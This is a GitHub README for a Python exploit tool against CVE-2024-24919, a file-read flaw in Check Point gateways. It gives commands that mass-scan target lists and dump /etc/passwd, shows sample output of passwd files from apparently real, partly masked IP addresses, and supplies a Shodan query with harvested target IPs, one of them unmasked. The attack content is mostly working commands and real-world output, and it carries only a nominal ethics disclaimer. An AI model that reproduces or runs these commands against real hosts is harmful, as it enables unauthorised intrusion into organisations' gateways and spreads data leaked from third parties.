/CVE-2024-24919

An Vulnerability detection and Exploitation tool for CVE-2024-24919

Primary LanguagePython

CVE-2024-24919

An Vulnerability detection and Exploitation tool for CVE-2024-24919

Installation:

git clone https://github.com/RevoltSecurities/CVE-2024-24919
pip install -r requirements.txt
python3 exploit.py --help

Usage:

python3 exploit.py -h                                                  


    ______     ____  __         _ ______         
   / ____/  __/ __ \/ /  ____  (_)_  __/__  _____
  / __/ | |/_/ /_/ / /  / __ \/ / / / / _ \/ ___/
 / /____>  </ ____/ /__/ /_/ / / / / /  __/ /    
/_____/_/|_/_/   /_____|____/_/ /_/  \___/_/     
  
                    @RevoltSecurities

[Description]: Vulnerability Detection and Exploitation tool for CVE-2024-24919

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     [INF]: Specify a URL or domain for vulnerability detection
  -l LIST, --list LIST  [INF]: Specify a list of URLs for vulnerability detection
  -ftd FILE_TO_DUMP, --file-to-dump FILE_TO_DUMP
                        [INF]: Specify a file path to dump (default: /etc/passwd)
  -t THREADS, --threads THREADS
                        [INF]: Number of threads for list of URLs
  -proxy PROXY, --proxy PROXY
                        [INF]: Proxy URL to send request via your proxy
  -v, --verbose         [INF]: Increases verbosity of output in console
  -o OUTPUT, --output OUTPUT
                        [INF]: Filename to save output of vulnerable target]

Sample Usage:

 python3 exploit.py -l targets.txt -t 200 -o output.txt -ftd /etc/passwd


    ______     ____  __         _ ______         
   / ____/  __/ __ \/ /  ____  (_)_  __/__  _____
  / __/ | |/_/ /_/ / /  / __ \/ / / / / _ \/ ___/
 / /____>  </ ____/ /__/ /_/ / / / / /  __/ /    
/_____/_/|_/_/   /_____|____/_/ /_/  \___/_/     
  
                    @RevoltSecurities

[Vulnerable]: https://185.200.78.XXXX
### Never edit this file manually. In order to login as expert and allow scp access, run "bashUser on" ###
root:!:0:0:root:/:/bin/false
nobody:x:99:99:nobody:/nonexistent:/bin/false
ntp:x:38:38::/nonexistent:/bin/false
rpm:x:37:37::/nonexistent:/bin/false
pcap:x:77:77::/nonexistent:/bin/false
admin:x:0:0:Linux User,,,:/:/bin/bash
saytel_adm:x:0:0:Linux User,,,:/:/bin/clish
davidg_adm:x:0:0:Linux User,,,:/:/bin/clish
sshd:x:74:74:Privilege-separated:/var/empty/sshd:/bin/false

[Vulnerable]: https://207.232.4XX.XXX
### Never edit this file manually. In order to login as expert and allow scp access, run "bashUser on" ###
root:!:0:0:root:/:/bin/false
nobody:x:99:99:nobody:/nonexistent:/bin/false
ntp:x:38:38::/nonexistent:/bin/false
rpm:x:37:37::/nonexistent:/bin/false
pcap:x:77:77::/nonexistent:/bin/false
admin:x:0:0:Linux User,,,:/:/bin/clish
sshd:x:74:74:Privilege-separated:/var/empty/sshd:/bin/false
wansup:x:0:0:Linux User,,,:/:/bin/clish

[Vulnerable]: https://81.218.166.XXX
### Never edit this file manually. In order to login as expert and allow scp access, run "bashUser on" ###
root:!:0:0:root:/:/bin/false
nobody:x:99:99:nobody:/nonexistent:/bin/false
ntp:x:38:38::/nonexistent:/bin/false
rpm:x:37:37::/nonexistent:/bin/false
pcap:x:77:77::/nonexistent:/bin/false
ace:x:0:0:Linux User,,,:/:/bin/clish
joker:x:0:0:Linux User,,,:/:/bin/clish
sshd:x:74:74:Privilege-separated:/var/empty/sshd:/bin/false

Info:

Wanna scrape targets and test then install our Unique tool ShodanX and get realtime data of shodan from you Terminal to scrape targets install the Shodanx and Use the command:

shodanx custom -cq '"Server: Check Point SVN" "X-UA-Compatible: IE=EmulateIE7" 200' -fct ip -o targets.txt
shodanx custom -cq '"Server: Check Point SVN" "X-UA-Compatible: IE=EmulateIE7" 200' -fct ip -o targets.txt

      _                 _               __   __
     | |               | |              \ \ / /
 ___ | |__    ___    __| |  __ _  _ __   \ V / 
/ __|| '_ \  / _ \  / _` | / _` || '_ \   > <  
\__ \| | | || (_) || (_| || (_| || | | | / . \ 
|___/|_| |_| \___/  \__,_| \__,_||_| |_|/_/ \_\
                                               
                                               

    
                     Author : D.SanjaiKumar @CyberRevoltSecurities

[Version]:ShodanX current version v1.0.1 (latest)
[INFO]: Results Found for your query and facet: "Server: Check Point SVN" "X-UA-Compatible: IE=EmulateIE7" 200 & facet:"ip"
[INFO]: 2.82.75.X
[INFO]: 5.102.XXX.XXX
[INFO]: 5.102.203.XXX
[INFO]: 5.102.210.XX
[INFO]: 5.102.211.23
[INFO]: 5.102.XXXX.127
[INFO]: 5.102.233.XXX

About :

The tool is Developed by D.Sanjai Kumar @RevoltSecurities to detect and exploit the Vulnerability CVE-2024-24919 , The tool is only for education and ethical purpose only and Developers are not responsible for any illegal exploitations.